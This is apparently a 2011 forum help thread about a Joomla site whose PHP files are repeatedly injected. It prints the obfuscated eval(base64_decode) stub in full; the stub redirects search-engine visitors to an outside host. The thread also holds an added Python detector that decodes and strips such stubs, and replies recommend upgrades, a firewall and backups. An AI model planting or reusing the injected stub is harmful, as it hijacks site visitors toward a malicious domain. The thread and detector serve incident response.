Solved

Joomla Exploit

Posted on 2011-09-21
Last Modified: 2012-05-12
We are being attacked weekly with the same code.

Added to the changelog, configuration, credits, license, and index PHP files is the code (after the <?php).

I remove the code when I see the files have been modified, which seems to be weekly... but they return.

The code added is attached.

I know a resolution would be to upgrade to 1.7 Joomla but am hoping to find a more expedient and less costly option for my client.
<?php	                                       	eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsKCWV4aXQoKTsKCX0KfQp9Cgl9"));

Question by:bborner
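
A defensive check for the injection described in the question, added here as an example (not code from the original post or from Joomla): it finds an eval(base64_decode("...")) statement placed right after <?php, decodes the payload to text for review without executing it, and returns a cleaned copy of the file contents. The name inspect_php, the sample file contents and the host redirect.example are constructed for illustration.

```python
import base64
import binascii
import re

# Matches the injection style shown in the post: an eval(base64_decode("..."))
# call placed right after the opening <?php tag, often padded with whitespace.
INJECTION_RE = re.compile(
    r'(<\?php)\s*eval\s*\(\s*base64_decode\s*\(\s*'
    r'["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)\s*;',
    re.IGNORECASE,
)
REDIRECT_RE = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)', re.IGNORECASE)


def inspect_php(source: str) -> dict:
    """Report injected eval(base64_decode()) stubs; the payload is decoded to
    text for review only and is never executed."""
    findings = []
    for match in INJECTION_RE.finditer(source):
        try:
            decoded = base64.b64decode(match.group(2), validate=False)
        except (binascii.Error, ValueError):
            decoded = b""
        text = decoded.decode("utf-8", errors="replace")
        findings.append({
            "offset": match.start(),
            "decoded": text,
            "redirects": REDIRECT_RE.findall(text),
        })
    # Cleaned copy: keep the <?php tag, drop only the injected statement.
    cleaned = INJECTION_RE.sub(lambda m: m.group(1), source)
    return {"infected": bool(findings), "findings": findings, "cleaned": cleaned}


# Constructed sample: a harmless stand-in payload with a placeholder host,
# wrapped the same way as the stub in the post.
_PAYLOAD = b'error_reporting(0);\nheader("Location: http://redirect.example/");\nexit();'
SAMPLE_INFECTED = (
    '<?php\t        eval(base64_decode("'
    + base64.b64encode(_PAYLOAD).decode("ascii")
    + '"));\n// Joomla configuration (constructed)\nclass JConfig {}\n'
)
SAMPLE_CLEAN = "<?php\n// Joomla configuration (constructed)\nclass JConfig {}\n"

if __name__ == "__main__":
    report = inspect_php(SAMPLE_INFECTED)
    for f in report["findings"]:
        print("injection at offset", f["offset"], "redirects to", f["redirects"])
```

Running it over every .php file in the site root on a schedule shows which files were modified again; cleaning the files does not close the hole that lets the code be written back.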
7 Comments
 
LVL 13

Accepted Solution

by:
Andrew Derse earned 250 total points
ID: 36576543
Well, for starters, you should at least upgrade to Joomla 1.5.23. Joomla 1.5.6 is much less secure than that.

Please let me know if you need help in finding the upgrade files.

Also, please check into RS Firewall, it does cost a little bit of $$, but it WILL help you in your fight against the hackers.

Main goal though is to get upgraded to 1.5.23 first.
0
 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36576559
Here's a link for RS Firewall:
http://www.rsjoomla.com/joomla-extensions/joomla-security.html

And a link for the 1.5.23 upgrade from your version:
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5848

*Also make sure you back up your website on a regular basis.  Akeeba Backup will assist with that.
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/1606

Please let me know if you need any additional help.
0
 

Author Comment

by:bborner
ID: 36577975
Great advice ... will take it one step at a time starting with Akeeba.
Will get back to you with progress.
Thanks
0
 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36579533
Sounds good.
0
 
LVL 15

Expert Comment

by:Russell_Venable
ID: 36581860
Can't tell you what they're using, as the code you posted got edited by the moderators, it seems, at least.
0
 
LVL 15

Assisted Solution

by:Russell_Venable
Russell_Venable earned 250 total points
ID: 36582192
You can scan your website using the Joomla vulnerability scanner, which is made by yehs, which is an ethical hacker group dedicated to finding and patching these vulnerabilities. So credentials are valid and trustable.

You can download it from OWASP or their own site; both links are on this page: https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project

At least this will give you an idea of what fixes you need to look out for and what PHP file is giving the problem.


0
 
LVL 14

Expert Comment

by:Allan Nisbet
ID: 36585995
Yeah, the code seems edited so I can't see where they are attacking.

Feel free to email me the code via the contact form on our profile site

Should be fairly easy to block this, we had one similar through com_properties that looks like a similar exploit

Also get Admin Tools, as it adds lots of features to the site for security protection.

Storm
0
